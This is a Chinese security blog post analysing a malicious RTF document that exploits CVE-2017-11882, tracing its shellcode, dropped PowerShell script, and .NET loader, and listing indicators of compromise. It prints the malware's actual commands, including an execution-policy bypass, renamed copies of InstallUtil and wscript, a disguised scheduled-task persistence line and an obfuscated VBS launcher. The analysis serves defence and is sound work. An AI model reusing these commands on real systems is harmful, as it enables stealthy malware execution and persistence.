一个奇怪的CVE-2017-11882漏洞样本

阅读量1228043

|评论5

|

发布时间 : 2019-11-25 16:30:48

 

一、静态分析

近期,CVE-2017-11882漏洞攻击还是很多,各种变异样本层出不穷。近发现又一个CVE-2017-11882文档,为RTF格式文件,通过分析其shellcode,发现作者还是很用心的。

文档打开后,显示的是乱码,如下图所示:

其中,在乱码下面包含三个对象,从左到右分别是Package对象、公式对象和图片。

1、Package对象

最左边对象为Package对象,如下图所示:

查看Package对象属性,其释放到临时目录下,文件名为e.m。

查看%temp%目录,发现下面确实生成一个e.m文件。

查看e.m文件,大小为94720,内容是一堆乱码。

2、公式对象

中间对象是一个windows公式对象,如下图所示:

3、图片

最右边的显示“0”的其实是一个图片,如下图所示:

4、RTFOBJ分析

利用RTFOBJ工具分析RTF文件,发现无法顺利解析该格式,显然作者经过了特殊处理,结果如下图:

 

二、动态分析

利用Process Monitor监控doc文档打开的动作,如下图所示:

具体如下:

1、DOC文档打开后,winword.exe调用EQNEDT32.EXE执行。

2、EQNEDT32.EXE调用运行cmd.exe,具体为: cmd.exe /c %windir%\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File X7jnZ.ps1。

3、Powershell.exe执行后,复制InstallUtil.exe和wscript.exe两个文件到临时目录下,并分别保存为mscorsw.exe和winwsh.exe。

"C:\Windows\system32\cmd.exe"  /c copy /y C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe C:\Users\admin\AppData\Local\Temp\mscorsw.exe

"C:\Windows\system32\cmd.exe"  /c copy /y C:\Windows\system32\wscript.exe C:\Users\admin\AppData\Local\Temp\winwsh.exe

4、Powershell.exe创建任务,任务如下:

C:\Windows\system32\schtasks.exe"  /create /sc minute /mo 3 /tn "Security Script kb00588535" /tr "C:\Users\admin\AppData\Local\Temp\winwsh.exe //Nologo //E:vbscript //B C:\Users\admin\AppData\Local\Temp\Win836896.txt" /F

CreateObject(chr(87)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)).Run """C:\Users\admin\AppData\Local\Temp\mscorsw.exe"" /logfile= /u /LogToConsole=false ""C:\Users\admin\AppData\Local\Temp\tmp_Kquxaf.dat""", 0

创建的任务名为:“Security Script kb00588535”,时间间隔为:3分钟,可执行路径为临时目录下winwsh.exe(其实为wscript.exe),运行的vbs脚本为临时目录下Win836896.txt,文件内容如下:

5、VBS运行

VBS运行后,实际运行的mscorsw.exe(其实为InstallUtil.exe),调用的具体命令如下:

"C:\Users\admin\AppData\Local\Temp\mscorsw.exe"  /logfile= /u /LogToConsole=false "C:\Users\admin\AppData\Local\Temp\tmp_Kquxaf.dat"

其中, tmp_Kquxaf.dat是一个PE文件。修改为EXE文件后,其属性如下图所示:

InstallUtil.exe安装程序工具是一个命令行实用工具,你可以通过此工具执行指定程序集中的安装程序组件,从而安装和卸载服务器资源。程序运行语法如下:


C:\Windows\Microsoft.NET\Framework\v4.0.30319>InstallUtil.exe

Microsoft (R) .NET Framework 安装实用工具版本 4.7.3056.0

版权所有 (C) Microsoft Corporation。保留所有权利。



用法: InstallUtil [/u | /uninstall] [option [...]] assembly [[[option [...]] assembly] [...]]



InstallUtil 执行每个给定程序集中的安装程序。

如果指定 /u 或 /uninstall 开关,则它卸载

程序集;反之,则安装它们。与其他

选项不同,/u 应用于所有的程序集,而不管它出现在命令行上

的位置。



安装程序以事务处理的方式完成: 如果其中的一个

程序集安装失败,则其他的所有安装程序集的安装

都会被回滚。卸载不是按事务处理的。



选项的格式为 /switch=[value]。出现在程序集名称之前的

任何选项都将应用到该程序集的安装。

选项是累积的但可以重写 - 为一个程序集指定的选项

将应用到下一个程序集,

除非为该选项指定一个新值。所有选项的默认设置是空的或为 False,

除非另行指定。



识别的选项:



用于安装任何程序集的选项:

/AssemblyName

 程序集参数将被解释为程序集名称(Name,

 Locale, PublicKeyToken, Version)。

 默认情况下,将程序集参数解释为磁盘上的程序集的文件名。



/LogFile=[filename]

  向其中写入进度的文件。如果为空,则不写入日志。默认为

 <assemblyname>.InstallLog



/LogToConsole={true|false}

 如果为 false,则不向控制台输出。



/ShowCallStack

 如果在安装过程中的任何时候发生异常,则将

调用堆栈输出到日志。



/InstallStateDir=[directoryname]

 要在其中存储 .InstallState 文件的目录。默认为

 程序集的目录。





在程序集中使用的各个安装程序可以识别其他

选项。若要了解这些选项,请在命令行上运行 InstallUtil,并在该命令后面带上

程序集的路径和 /? 或 /help 选项。

因此,上面VBS运行后,其用途竟然是卸载tmp_Kquxaf.dat,好奇怪。这个是什么操作?

把InstallUtil.exe的参数修改为显示控制台,并且保存日志,运行后如下图所示:

我们再来看,如果不加/u参数,也就是非卸载操作,而是安装操作,会如何?运行结果如下图所示:

 

三、网络连接

利用wireshark抓包,发现文档打开后有发起DNS请求www.norejike.com,该域名目前无法解析:

查询域名:

由于无法判断是哪个进程发起的连接请求,于是修改本地hosts文件,让其ip解析为5.5.5.5

接着查看网络连接,发现PID为2532的进程发出了443连接请求,对应的进程是mscorsw.exe进程

根据前面的介绍,其实是tmp_Kquxaf.dat发出的网络操作。

"C:\Users\admin\AppData\Local\Temp\mscorsw.exe"  /logfile= /u /LogToConsole=false "C:\Users\admin\AppData\Local\Temp\tmp_Kquxaf.dat"

 

四、漏洞调试

根据cve-2017-11882漏洞特点,我们直接调试,断点中断在00411658位置,如下图所示:

经过多次的复制操作后,栈溢出被覆盖,此时ESP位置内容为:

其中0x0045159B是返回后的EIP地址,我们查看该处值为0xC3,正式汇编指令retn。

本漏洞是典型的栈溢出漏洞,retn返回后,执行第一段shellcode指令。我们接着查看该shellcode在RTF文档中的位置,在位置在0x000427EB处,如下图所示:

接下来,进行shellcode的解密操作:

循环解密指令的长度为0x16CB,shellcode的密码位置在RTF文档的0x4287B处,如下图所示:

经过xor 0Xb6解密操作后的shellcode如下图所示:

该段shellcode执行后,动态获取需要调用的函数。接下来是获取e.m(Package对象)在临时目录的全路径:

然后是对e.m文件进行解密操作,大小为0x17200,如下图所示:

e.m解密后是一个PE文件,如下图所示:

接着判断解密后的内容是否为合法的PE文件,如下图所示:

然后在内存中运行该PE文件。

我们直接从内存中把解密后的PE文件导出到本地文件,并保存为mem.pe.exe,其属性如下:

该PE文件其实是一个标准的windows系统CAB自解压安装文件,在文件中找到自安装运行的可执行路径为:cmd.exe /c %windir%\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File X7jnZ.ps1,如下图所示:

我们用winrar解压缩,发现文件里面就包含一个X7jnZ.ps1文件,是Powershell运行脚本。

终于X7jnZ.ps1文件发现了,我们来看其具体内容:

直接利用powershell执行该脚本,结果如下:


powershell.exe -ExecutionPolicy Bypass -File X7jnZ.ps1

已复制         1 个文件。

powershell.exe : Get-Process : 找不到名为“avp”的进程。请验证该进程名称,然后再次调用 cmdlet。

所在位置 行:1 字符: 15

+ powershell.exe <<<<  -ExecutionPolicy Bypass -File X7jnZ.ps1

    + CategoryInfo          : NotSpecified: (Get-Process : 找...,然后再次调用 cmdlet。:String) [], RemoteException

    + FullyQualifiedErrorId : NativeCommandError



所在位置 行:53 字符: 20



+     $avp = Get-Process <<<<  -Name avp



    + CategoryInfo          : ObjectNotFound: (avp:String) [Get-Process], Proc



   essCommandException



    + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.



   Commands.GetProcessCommand







Get-Process : 找不到名为“avpui”的进程。请验证该进程名称,然后再次调用 cmdlet



。



所在位置 行:54 字符: 22



+     $avpui = Get-Process <<<<  -Name avpui



    + CategoryInfo          : ObjectNotFound: (avpui:String) [Get-Process], Pr



   ocessCommandException



    + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.



   Commands.GetProcessCommand







已复制         1 个文件。

成功: 成功创建计划任务 "Security Script kb00588535"。

成功: 尝试运行 "Security Script kb00588535"。

再次调用,会报错说tmp_Kquxaf.dat被占用,无法写入文件,因此,tmp_Kquxaf.dat文件也是X7jnZ.ps1脚本运行后释放出来的。此外,X7jnZ.ps1脚本还复制InstallUtil.exe和wscript.exe两个文件到临时目录下,并分别保存为mscorsw.exe和winwsh.exe,之后创建计划任务并启动,动作和动态分析一致。

至此,样本执行后的动作基本分析完毕。

 

五、tmp_Kquxaf.dat初步分析

上文说到VBS脚本用途竟然是卸载tmp_Kquxaf.dat很奇怪。接下来分析一下tmp_Kquxaf.dat的作用。tmp_Kquxaf.dat是.net程序,当调用-u卸载的时候调用Uninstall函数,该函数的作用是创建互斥变量,并调用并运行函数GoCode.Exec(),如下图所示:

我们来看GoCode类,根据其函数名和相关的变量,看出该类功能应该是内存执行shellcode。

在IDA中查看EXEC函数,该函数先对shellcode字符串进行处理,shellcode字符串如下图所示:

然后对上述字符串进行base64解码,再利用CreateRemote创建线程执行,如下图所示:

六、结语

本文主要分析了一个CVE-2017-11882样本,该样本总结起来有以下几个特点:

1、样本自身包含恶意代码,没有利用远程下载的方式,避免winword打开后直接访问网络。

2、样本shellcode功能较为复杂,包含API地址获取、解密、内存加载运行等。

3、奇怪的一些点是,创建的任务每隔3分钟运行,有点太频繁;访问的域名目前未启用,该样本难道是测试作用?

IOCS:

Virus.doc:4a639d907a9e5401c3f7b26d65ca4b4ca5e8feb3406739afd9d7bcb126c50467(virustotal:19 engines detected this file)

tmp_Kquxaf.dat:c2e92ca88cac02a17232006b869a44d8b1686c8955cdb4ff7e7c717d3aa20a09(virustotal:26 engines detected this file)

X7jnZ.ps1:140bd1c5b0162b359db20eaef888ceb106cdca0fab234999aae1ce99f18d5800(virustotal:No matches found)

Pe.mem.exe:0be1b9ec479ddd3be6ef6b76068100ec3c00d2a4148d6dab402af88489b75aee(virustotal:No matches found)

domain:www.norejike.com

本文由十十十十惑原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/193586

安全KER - 有思想的安全新媒体

分享到:微信
+15赞
收藏
十十十十惑
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66